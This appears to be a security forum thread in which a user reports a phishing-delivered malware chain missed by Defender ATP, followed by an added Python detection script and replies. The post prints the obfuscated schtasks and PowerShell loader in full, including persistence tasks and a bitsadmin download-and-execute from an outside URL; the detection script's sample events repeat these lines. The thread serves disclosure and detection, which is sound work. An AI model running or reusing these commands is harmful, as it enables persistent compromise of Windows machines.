Malware not detected (but it should)

pbaratta
Occasional Contributor

Some days ago a colleague received an email (O365 ATP protected) and clicked the link inside.

  • The link caused a zip file to be downloaded
  • the zip contained 2 files, a shortcut and an xml file
  • the shortcut actually created a scheduled task: %windir%\System32\schtasks.exe /F /Create /sc minute /MO 15 /TN "AI" /ST 05:43 /TR "cmd /c power%os:~6,1%hell -eP bypAss -win 1 -c '&{cd %public:~-15,9%\;$k=dir -r -force -in riepi*.*|select -last 1;$k=cat -LiteralPath $k;%os:~1,1%ex $k[$k.length-1]}'"
  • so a cmd was started and then a powershell command to parse the content of the zip file
  • the zip file contained the string below (to install the malware)

Now the malware is correctly detected, but a week ago it wasn't; the reason for concern is that Defender ATP SHOULD have detected suspicious activity:

  • a zip was downloaded
  • the lnk file when double-clicked created a task
  • the task launched a cmd, the cmd launched a powershell, and the powershell went through the file system to get the original zip and install the malware

I'm wondering why no suspicious activity was detected.

I also wonder why there is no way to interact with MSFT support in such a case if you don't have a support plan; the evidence is that I'm facing a product issue.

 

The string contained at the end of the zip file:

$IPgHSp9NqFwlyUdz9EiUaC=$env:HOMEDRIVE+$env:HOMEPATH+'\AppData\Roaming'; start-process -wiNdowStylE HiDden schtasks '/change /tn AI /disable'; $1ky8EqL4xuTNcMdlzE160A0 = (Get-WmiObject Win32_ComputerSystemProduct).UUID; $d9aSs4246nDe2406Bu0oGMC=$1ky8EqL4xuTNcMdlzE160A0.Substring(0,6); $2mg4sgEtuOEmhIplOMZ3O34 = $IPgHSp9NqFwlyUdz9EiUaC+'\'+$d9aSs4246nDe2406Bu0oGMC;If(test-path $2mg4sgEtuOEmhIplOMZ3O34"\_in"){$gZ6ZH3E1bBYDLsCi90GNDKJzl = (Get-Date).AddMinutes(-20);$gwbsm1Im8I4bn6mZ40KwC3GD=Get-ChildItem -Path $2mg4sgEtuOEmhIplOMZ3O34"\_in" | Where-Object {$_.LastWriteTime -gt $gZ6ZH3E1bBYDLsCi90GNDKJzl };if ($gwbsm1Im8I4bn6mZ40KwC3GD){exit;}}; New-Item -ItemType Directory -Force -Path $2mg4sgEtuOEmhIplOMZ3O34;$rr="`$namKgJJlKuRmxyZh=""$2mg4sgEtuOEmhIplOMZ3O34\sbr_init.ps1"";`$clpsr='/C bitsadmin /transfer JuhtdQPu /download /priority FOREGROUND ""https://mrscremeansclassroom.com/kfldcncjfvdwer/sdcmgfkbfg"" ""'+`$namKgJJlKuRmxyZh+'""'; start-process -wiNdowStylE HiDden cmd.exe `$clpsr;`$e=1;while(`$e -eq 1){If(test-path `$namKgJJlKuRmxyZh){`$e=3;}Start-Sleep -s 3;};`$clpsr='/C powershell -win hidden -ep bypass -File '+`$namKgJJlKuRmxyZh;start-process -wiNdowStylE HiDden cmd.exe `$clpsr;";$rr | out-file $2mg4sgEtuOEmhIplOMZ3O34'\KG1PNqifExGVCbhCkcxwnc.ps1';$VEzW3fIGi5Wmyd12HPG46o=' /F /create /sc minute /mo 5 /TN "AppRunLog" /ST 03:30 /TR "powershell.exe -ep bypass -win 1 -file '+$2mg4sgEtuOEmhIplOMZ3O34+'\KG1PNqifExGVCbhCkcxwnc.ps1 "'; start-process -wiNdowStylE HiDden schtasks $VEzW3fIGi5Wmyd12HPG46o;
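
As an added example (not code from this thread, and not a Microsoft detection), the script below shows the kind of process-creation triage a practitioner would want for the chain described above: it expands the cmd.exe `%VAR:~start,len%` substring trick so that `power%os:~6,1%hell` and `%os:~1,1%ex` become `powershell` and `iex`, then scores indicators that appear in both the first-stage schtasks command and the second-stage script (task creation that runs a shell, `-ep bypass`, hidden window, `iex`, `bitsadmin /transfer`, and `schtasks.exe` spawned from an archiver or browser, as in the reply's process tree). Assumptions: the environment values `OS=Windows_NT` and `PUBLIC=C:\Users\Public`, the event field names, the indicator weights and threshold, and the sample events themselves (the user name `alice` and the `4C4C45` directory are constructed placeholders for the UUID-derived path).

```python
"""Triage of process-creation events for the lnk -> schtasks -> cmd -> powershell chain.
Added example; event schema, environment values, weights and sample data are assumptions."""
import re

# Assumed environment a cmd.exe substring expansion would see on a default Windows host.
ASSUMED_ENV = {"os": "Windows_NT", "public": r"C:\Users\Public"}

# cmd.exe substring syntax: %VAR:~start% or %VAR:~start,len% (negative values count from the end).
SUBSTR_RE = re.compile(r"%(\w+):~(-?\d+)(?:,(-?\d+))?%")


def expand_cmd_substrings(cmdline, env=ASSUMED_ENV):
    """Resolve %VAR:~start,len% the way cmd.exe does, so 'power%os:~6,1%hell' reads 'powershell'."""
    def repl(m):
        value = env.get(m.group(1).lower())
        if value is None:
            return m.group(0)                      # unknown variable: leave the token untouched
        start = int(m.group(2))
        if start < 0:
            start = max(len(value) + start, 0)
        if m.group(3) is None:
            return value[start:]
        length = int(m.group(3))
        end = start + length if length >= 0 else len(value) + length
        return value[start:end]
    return SUBSTR_RE.sub(repl, cmdline)


def leaf(path):
    """Basename of a Windows path, independent of the analysis host's separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# (name, assumed weight, pattern) evaluated against the EXPANDED command line.
INDICATORS = [
    ("schtasks_create_runs_shell", 2, re.compile(r"schtasks(\.exe)?\b.*?/create\b.*?/tr\b.*?\b(cmd|powershell)\b", re.I | re.S)),
    ("powershell_ep_bypass", 1, re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I)),
    ("powershell_hidden_window", 1, re.compile(r"-w(indowstyle|in)?\s+(1|hidden)\b", re.I)),
    ("invoke_expression", 2, re.compile(r"\biex\b|invoke-expression", re.I)),
    ("bitsadmin_download", 3, re.compile(r"bitsadmin\b.*?/transfer", re.I)),
    ("task_disabled_after_use", 2, re.compile(r"schtasks.*?/change\b.*?/disable", re.I | re.S)),
]
# Parents that should not normally spawn schtasks.exe (the reply's tree shows WinRAR.exe doing so).
ARCHIVER_OR_BROWSER = {"winrar.exe", "7zfm.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
THRESHOLD = 3  # assumed: scores at or above this are flagged


def analyse(event):
    raw = event["cmdline"]
    expanded = expand_cmd_substrings(raw)
    hits, score = [], 0
    if SUBSTR_RE.search(raw):                      # obfuscation is only visible on the raw string
        hits.append("env_substring_obfuscation"); score += 3
    for name, weight, rx in INDICATORS:
        if rx.search(expanded):
            hits.append(name); score += weight
    if leaf(event.get("image", "")) == "schtasks.exe" and leaf(event.get("parent", "")) in ARCHIVER_OR_BROWSER:
        hits.append("schtasks_from_archiver_or_browser"); score += 2
    return {"id": event["id"], "expanded": expanded, "hits": hits, "score": score, "suspicious": score >= THRESHOLD}


# Constructed sample events. 1 wraps the schtasks line from the post; 2 and 3 are the persistence task and
# the bitsadmin download the second-stage script issues; 4 and 5 are benign controls.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmdline": r'''%windir%\System32\schtasks.exe /F /Create /sc minute /MO 15 /TN "AI" /ST 05:43 /TR "cmd /c power%os:~6,1%hell -eP bypAss -win 1 -c '&{cd %public:~-15,9%\;$k=dir -r -force -in riepi*.*|select -last 1;$k=cat -LiteralPath $k;%os:~1,1%ex $k[$k.length-1]}'"'''},
    {"id": 2, "image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'schtasks /F /create /sc minute /mo 5 /TN "AppRunLog" /ST 03:30 /TR "powershell.exe -ep bypass -win 1 -file C:\Users\alice\AppData\Roaming\4C4C45\KG1PNqifExGVCbhCkcxwnc.ps1 "'},
    {"id": 3, "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'cmd.exe /C bitsadmin /transfer JuhtdQPu /download /priority FOREGROUND "https://mrscremeansclassroom.com/kfldcncjfvdwer/sdcmgfkbfg" "C:\Users\alice\AppData\Roaming\4C4C45\sbr_init.ps1"'},
    {"id": 4, "image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'schtasks.exe /Create /sc daily /TN "Backup" /TR "C:\Tools\backup.exe" /ST 02:00'},
    {"id": 5, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -NoProfile -File C:\Scripts\inventory.ps1'},
]


def run_all(events=SAMPLE_EVENTS):
    return [analyse(e) for e in events]


if __name__ == "__main__":
    for r in run_all():
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"event {r['id']}: {flag} score={r['score']} hits={r['hits']}")
```

Running the rules on the expanded command line matters: on the raw string neither `powershell` nor `iex` is present, which is exactly why a substring-aware expansion step belongs before keyword matching.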

4 Replies

@pbaratta Yea this is somewhat concerning. I half replicated what you posted. Created a shortcut with the scheduled task command line and zipped it up. Uploaded to google drive, downloaded it then executed. 

-explorer.exe
 -- chrome.exe
  --- WinRAR.exe
   ----schtasks.exe

 

Uhh yea that does not look legitimate

hopefully we'll have feedback from Microsoft

@pbaratta thanks for reporting this. However, this is not a support forum. For a thorough response please open a support ticket (top right corner of the portal, under the '?' sign). 

@Raviv Tamir I know this is not a support forum, but I still think it's interesting (and important as well) to discuss with the community what happens in our environment. Don't you?
